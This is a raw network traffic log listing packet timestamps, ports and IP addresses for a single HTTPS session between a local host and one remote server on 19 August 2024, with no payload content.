Aug 19, 2024 09:28:44.411801100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.411834955 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.411866903 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.411885023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.411896944 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.412023067 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.412036896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.412066936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.412075043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.412096024 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.434398890 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.434425116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.434583902 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.434606075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.464562893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.469300032 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.496134043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496170044 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496221066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496258020 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496421099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.496421099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.496443033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496464014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496485949 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496510983 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.496520042 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496541023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.496896029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496922016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496944904 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.496952057 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.496970892 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.497220039 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.497235060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.497282028 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.497289896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.504328966 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.504348993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.504393101 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.504409075 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.504430056 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.504715919 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.504736900 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.504760027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.504767895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.504784107 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.521881104 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.527008057 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.527025938 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.527215004 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.527235031 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.575505972 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.588757992 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.588779926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.588881016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.588932991 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589005947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.589005947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.589035988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589051008 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589087963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.589097023 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589108944 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.589114904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589143991 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.589570045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589587927 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589667082 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.589678049 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589803934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589818001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589853048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.589860916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.589885950 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.596932888 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.596955061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.597062111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.597090006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.597239017 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.597251892 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.597289085 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.597297907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.597320080 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.619597912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.619621038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.619839907 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.619874001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.669171095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.681469917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681478024 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681516886 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681529045 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.681588888 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.681605101 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681619883 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681638956 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.681644917 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681658030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681672096 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.681708097 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.681852102 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681869030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681912899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.681920052 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.681957006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.682132006 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.682152987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.682182074 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.682188988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.682209015 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.682226896 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.682425976 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.682442904 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.682478905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.682486057 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.682519913 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.682538033 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.689594030 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.689615011 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.689697027 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.689723015 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.689764023 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.689861059 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.689877987 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.689917088 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.689929962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.689949036 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.689970970 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.712749958 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.712770939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.712927103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.712927103 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.712951899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.713303089 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.749989986 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.774276972 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.774298906 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.774362087 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.774410009 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.774414062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.774446964 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.774569988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.774569988 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.774817944 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.774836063 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.774871111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.774877071 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.774902105 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.775012970 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.775032043 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.775059938 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.775064945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.775083065 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.775552988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.775569916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.775604963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.775614977 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.775630951 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.783256054 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.783278942 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.783387899 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.783425093 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.783834934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.783852100 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.783883095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.783945084 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.783956051 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.805269957 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.805294037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.805402040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.805442095 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.850061893 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.867319107 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.867338896 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.867455959 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.867481947 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.867553949 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.867554903 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.867614985 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.867656946 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.867666006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.867691994 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.867712975 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.867729902 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.867755890 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.868094921 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.868125916 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.868153095 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.868168116 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.868197918 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.868218899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.868232965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.868294954 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.868310928 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.876221895 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.876241922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.876344919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.876362085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.876446962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.876511097 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.876526117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.876557112 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.876631021 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.876646996 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.898164988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.898255110 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.898266077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.898294926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.898469925 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.901093006 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.959876060 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.959923029 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.959981918 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.960031033 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.960047960 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.960061073 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.960108995 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.960118055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.960139990 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.960169077 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.960192919 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.960788965 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.960832119 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.960859060 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.960871935 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.960886955 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.960907936 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.961026907 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.961086035 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.961086035 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.961123943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.961149931 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.961163044 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.961404085 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.961447001 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.961461067 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.961476088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.961496115 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.961513042 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.962181091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.968815088 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.968895912 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.968947887 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.968981028 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.968998909 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.969078064 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.969130993 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.969139099 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.969166040 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.969191074 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.969217062 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.989023924 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.990577936 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.990603924 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.990772963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:44.990794897 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:44.990835905 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.000832081 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.052505016 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.052561045 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.052628040 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.052696943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.052763939 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.052804947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.052804947 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.052815914 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.052835941 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.052850962 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.052886963 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.052908897 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.052992105 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053044081 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053064108 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.053080082 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053133011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.053133011 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.053430080 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053474903 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053502083 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.053517103 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053543091 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.053565025 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.053705931 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053751945 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053767920 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.053782940 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.053834915 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.053836107 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.056524992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.061439037 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.061461926 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.061510086 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.061527014 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.061552048 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.061652899 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.061675072 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.061719894 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.061739922 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.061790943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.061790943 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.083657026 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.083718061 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.083796978 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.083821058 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.083965063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.083965063 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.145313978 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145379066 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145534992 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.145561934 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145589113 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145606041 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.145638943 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145649910 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.145670891 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145704985 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.145728111 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.145812988 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145857096 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145888090 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.145920038 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.145960093 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.145982981 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.146083117 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.146135092 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.146152020 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.146166086 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.146213055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.146213055 CEST	49759	443	192.168.2.4	185.149.100.242
Aug 19, 2024 09:28:45.146475077 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.146503925 CEST	443	49759	185.149.100.242	192.168.2.4
Aug 19, 2024 09:28:45.146553040 CEST	49759	443	192.168.2.4	185.149.100.242
